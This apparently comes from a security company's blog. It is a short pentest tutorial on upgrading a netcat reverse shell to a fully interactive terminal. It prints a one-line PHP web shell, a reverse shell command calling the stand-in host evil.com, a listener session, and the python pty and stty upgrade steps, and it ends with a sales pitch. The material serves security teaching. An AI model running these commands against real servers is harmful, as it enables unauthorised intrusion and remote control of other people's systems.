Upgrade NetCat shell

The holy grail of a pen test is a functioning shell. When during a pen test it has been possible to take over the server by executing commands on the system, the hacker often sets up a connection to his server. NetCat is often used for this. NetCat is a tool on Linux systems that makes it possible to control other programs via the internet. However, one of the biggest frustrations for hackers is that the shell you get back is quite limited.

Hacking with NetCat

Suppose a hacker managed to upload a file called shell.php:
<?php system($_GET['cmd']);?>

The hacker opens a port on his own server (evil.com) that listens on port 4444. He does this with nc -lvp 4444. Now run the command nc -e / bin / bash evil.com 4444 on the hacked server. The hacked server will now establish a connection to the hacker’s server. We call this a reverse tcp shell.

john@Technetium:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [1.2.3.4] port 4444 [tcp/*] accepted (family 2, sport 54490)
whoami
cyberant
^C
john@Technetium:~$ whoami
john

Above is what a hacker will see. If the attacker accidentally enters CTRL-C, he will lose his shell. Also commands that require interaction (such as su) do not work.

Upgrade NC Shell to an interactive shell

The first step we can do to improve this is to start an interactive shell with Python. This can be done with the Python PTY module, and works as follows:

python -c 'import pty; pty.spawn("/bin/bash")'

The above command produces a semi-interactive shell. That is, it is possible to use commands such as su and mysql, which ask for a password. The shell still closes itself with CTRL-C, and auto completion via TAB doesn’t work either. With a few simple commands (and a little magic) we can now go to a full shell.

When we execute CTRL-Z the shell is moved to the background. Then we type (in our local terminal):

stty raw -echo
fg

The above ensures that we now have a full shell, and can do everything that could be done via SSH, for example. Functions such as tab completion and history are now working. And VIM via NetCat? Sure!

reverse tcp shell

More information about our solutions

Do you want to make sure that your websites, apps or systems are free from vulnerabilities? Our experts are happy to work for you. For more information about our pentests or other services, please feel free to contact us via the contact form below. We are happy to tell you what we can do for you.

    Contact

    Randstad 22 147
    1316BM Almere

    info@cyberant.com
    +31 (0)85 047 1590